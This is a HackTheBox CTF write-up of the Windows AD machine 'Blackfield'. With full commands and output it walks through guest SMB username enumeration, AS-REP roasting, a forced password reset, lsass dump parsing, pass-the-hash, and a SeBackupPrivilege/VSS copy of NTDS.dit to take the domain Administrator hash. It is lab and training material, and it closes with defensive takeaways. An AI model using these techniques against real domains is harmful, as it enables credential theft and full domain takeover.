~/writeups/Blackfield
Hard Windows Active Directory
Blackfield.
Hard Windows Active Directory AS-REP Roast lsass Dump SeBackupPrivilege HackTheBox
Hard Windows Active Directory machine with a clean, realistic attack chain. Guest SMB access leaks hundreds of usernames from a profiles share. AS-REP roasting cracks the support account. BloodHound reveals ForceChangePassword over audit2020, whose forensic share holds an lsass memory dump. pypykatz extracts the svc_backup NT hash — a Backup Operator account. SeBackupPrivilege combined with a VSS shadow copy lets us extract the locked NTDS.dit, giving us the domain Administrator hash.
User Flag
3920bb317axxxxxxxxxxxxxxxxxxxxxx
Root Flag
4375a629c7xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance

Full port scan reveals a classic DC profile. The domain is BLACKFIELD.local. No starting credentials — we begin unauthenticated.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.229.17 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Windows KDC 389/tcp open ldap Active Directory (Domain: BLACKFIELD.local) 445/tcp open microsoft-ds SMB (signing required) 5985/tcp open wsman WinRM | clock-skew: +7h0m3s
clock skew +7h: Kerberos requires clocks within 5 minutes of the DC. If you see KRB_AP_ERR_SKEW, sync first: sudo ntpdate -u 10.129.229.17. On this box NTLM is still available so it's rarely a blocker, but keep it in mind.
env setup
$ export IP=10.129.229.17 $ export DOMAIN=BLACKFIELD.local
02SMB Enumeration — Username Leak via profiles$

Null session is denied but the guest account (blank password) works. The profiles$ share contains hundreds of empty user profile directories — the directory names are valid AD usernames.

guest share enum
$ nxc smb $IP -u 'guest' -p '' --shares profiles$ READ forensic (no access) IPC$ READ
extract usernames from profiles$
$ smbclient //$IP/profiles$ -N -c ls | awk '{print $1}' | grep -v '^\.' | grep -v '^$' > users.txt
finding: ~300 AD usernames extracted. Notable ones: audit2020, support, svc_backup. The share exists purely for profile storage — guest read access exposes the entire user list.
03AS-REP Roasting — support

AS-REP roasting targets accounts with Kerberos pre-authentication disabled. Without pre-auth, the KDC returns an encrypted TGT blob to any unauthenticated requester — the blob is encrypted with the account's password hash and can be cracked offline.

GetNPUsers — scan full user list
$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $IP -no-pass -usersfile users.txt $krb5asrep$23$support@BLACKFIELD.LOCAL:934e6dd306...016d4f
hashcat — crack AS-REP hash
$ hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt support : #00^BlackKnight
credential: support:#00^BlackKnight — cracked in ~6 seconds.
04BloodHound — ACL Attack Path

With valid credentials, collect all BloodHound data to map AD attack paths.

bloodhound-python collection
$ bloodhound-python -u support -p '#00^BlackKnight' -d BLACKFIELD.local -ns $IP -c All --zip
attack path discovered: support →(ForceChangePassword)→ audit2020. ForceChangePassword allows changing a user's password without knowing their current one — full account takeover with no prior knowledge.
05ForceChangePassword → audit2020

Use rpcclient to change audit2020's password directly over SMB/IPC$. The info level 23 is Windows USER_INFO_23 — the RPC level specifically for password changes without requiring the current password.

rpcclient — force password change
$ rpcclient -U "support%#00^BlackKnight" $IP \ -c "setuserinfo2 audit2020 23 'Password123!'"
verify — forensic share now readable
$ nxc smb $IP -u audit2020 -p 'Password123!' --shares forensic READ
06forensic Share — lsass Memory Dump

The forensic share contains process memory dumps in memory_analysis/. The critical file is lsass.zip — LSASS (Local Security Authority Subsystem Service) handles Windows authentication and holds NT hashes and sometimes plaintext credentials for all logged-in users.

Standard smbclient get times out on large files. Use impacket-smbclient instead.

download lsass.zip via impacket-smbclient
$ impacket-smbclient 'BLACKFIELD.local/audit2020:Password123!@'$IP # use forensic # cd memory_analysis # get lsass.zip
pypykatz — parse lsass minidump
$ unzip lsass.zip $ pypykatz lsa minidump lsass.DMP 2>/dev/null | grep -A5 "svc_backup" Username: svc_backup NT: 9658d1d1dcd9250115e2205d9f48400d
credential: svc_backup NT hash 9658d1d1dcd9250115e2205d9f48400d. Storing process memory dumps on a network share is catastrophic — LSASS holds live credentials for every authenticated session.
07Foothold — svc_backup via Pass-the-Hash

Pass the NT hash directly to evil-winrm — no password cracking needed.

evil-winrm PTH → user flag
$ nxc winrm $IP -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d' [+] BLACKFIELD.local\svc_backup (Pwn3d!) $ evil-winrm -i $IP -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d' *Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt 3920bb317axxxxxxxxxxxxxxxxxxxxxx
confirm SeBackupPrivilege
*Evil-WinRM* PS C:\> whoami /priv SeBackupPrivilege Back up files and directories Enabled
key privilege: svc_backup is a member of Backup Operators. SeBackupPrivilege allows bypassing file ACLs for backup purposes — effectively full filesystem read, including locked files.
08Privilege Escalation — SeBackupPrivilege → NTDS.dit

Why NTDS.dit, not SAM? SAM stores hashes for local accounts only. On a Domain Controller, the domain Administrator hash lives in NTDS.dit at C:\Windows\NTDS\ntds.dit — the Active Directory database containing every domain account's NT hash. NTDS.dit is locked by the AD DS service while running; even with SeBackupPrivilege you can't copy it directly.

The solution: Volume Shadow Copy (VSS). VSS creates a point-in-time snapshot of a volume including locked files. We create a shadow copy of C:\, expose it as Z:\, then copy NTDS.dit from the snapshot where it isn't locked.

Step 1 — Create the diskshadow script on Kali. The script must use Windows line endings (CRLF) or diskshadow silently fails.

kali — create diskshadow script
$ cat > /tmp/shadow.dsh << 'EOF' set context persistent nowriters add volume c: alias blackfield create expose %blackfield% z: EOF $ unix2dos /tmp/shadow.dsh
unix2dos is mandatory: diskshadow parses each line expecting CRLF. With LF-only line endings it silently skips commands or errors out. The VSS context never gets created.

Step 2 — Execute on target.

evil-winrm — create VSS shadow copy
*Evil-WinRM* PS C:\> mkdir C:\temp *Evil-WinRM* PS C:\> cd C:\temp *Evil-WinRM* PS C:\temp> upload /tmp/shadow.dsh shadow.dsh *Evil-WinRM* PS C:\temp> diskshadow /s shadow.dsh ...Shadow copy created. Exposed as Z:\

Step 3 — Copy NTDS.dit from the shadow copy using backup semantics.

robocopy /b — bypass ACLs via SeBackupPrivilege
*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds C:\temp ntds.dit
why robocopy /b? The /b flag enables backup mode, which activates SeBackupPrivilege to bypass file ACL restrictions. Normal file copy commands don't invoke the privilege even when it's present.

Step 4 — Save the SYSTEM hive. NTDS.dit hashes are encrypted with a boot key stored in the SYSTEM registry hive — without it, secretsdump can't decrypt them.

save SYSTEM hive + download both files
*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM C:\temp\system.hive /y *Evil-WinRM* PS C:\temp> download ntds.dit *Evil-WinRM* PS C:\temp> download system.hive
09Root — secretsdump → Administrator Hash
impacket-secretsdump — extract all domain hashes
$ impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa::: support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212::: svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
evil-winrm PTH as Administrator → root flag
$ evil-winrm -i $IP -u Administrator -H '184fb5e5178480be64824d4cd53b99ee' *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 4375a629c7xxxxxxxxxxxxxxxxxxxxxx
10Full Attack Chain
attack chain summary
Anonymous / guest SMB → profiles$ share → ~300 AD usernames extracted │ ▼ AS-REP Roasting (pre-auth disabled) GetNPUsers → hashcat -m 18200 → support:#00^BlackKnight │ ▼ BloodHound support →(ForceChangePassword)→ audit2020 │ ▼ rpcclient setuserinfo2 → reset audit2020 password → audit2020:Password123! → forensic share READ │ ▼ lsass.zip download → pypykatz minidump parse → svc_backup NT:9658d1d1dcd9250115e2205d9f48400d │ ▼ Pass-the-Hash → evil-winrm → user.txt ✓ SeBackupPrivilege confirmed (Backup Operators) │ ▼ diskshadow (CRLF script) → VSS shadow copy → Z:\ robocopy /b → ntds.dit + reg save → system.hive │ ▼ impacket-secretsdump LOCALAdministrator NT:184fb5e5178480be64824d4cd53b99ee │ ▼ Pass-the-Hash → evil-winrm → root.txt ✓
key takeaways:
· Guest access to a profiles share leaks the entire user list — perfect AS-REP/spray target
· ForceChangePassword gives full account takeover with no knowledge of the current password
· LSASS memory dumps on network shares expose live NT hashes for all authenticated sessions
· SAM holds local accounts only — on a DC you need NTDS.dit for domain hashes
· SeBackupPrivilege = near-equivalent to Domain Admin; Backup Operators must be treated as a privileged group
· VSS shadow copies bypass file locks — the only reliable way to copy NTDS.dit from a live DC
· Both NTDS.dit and the SYSTEM hive are required: hashes are encrypted with the boot key stored in SYSTEM
← all writeups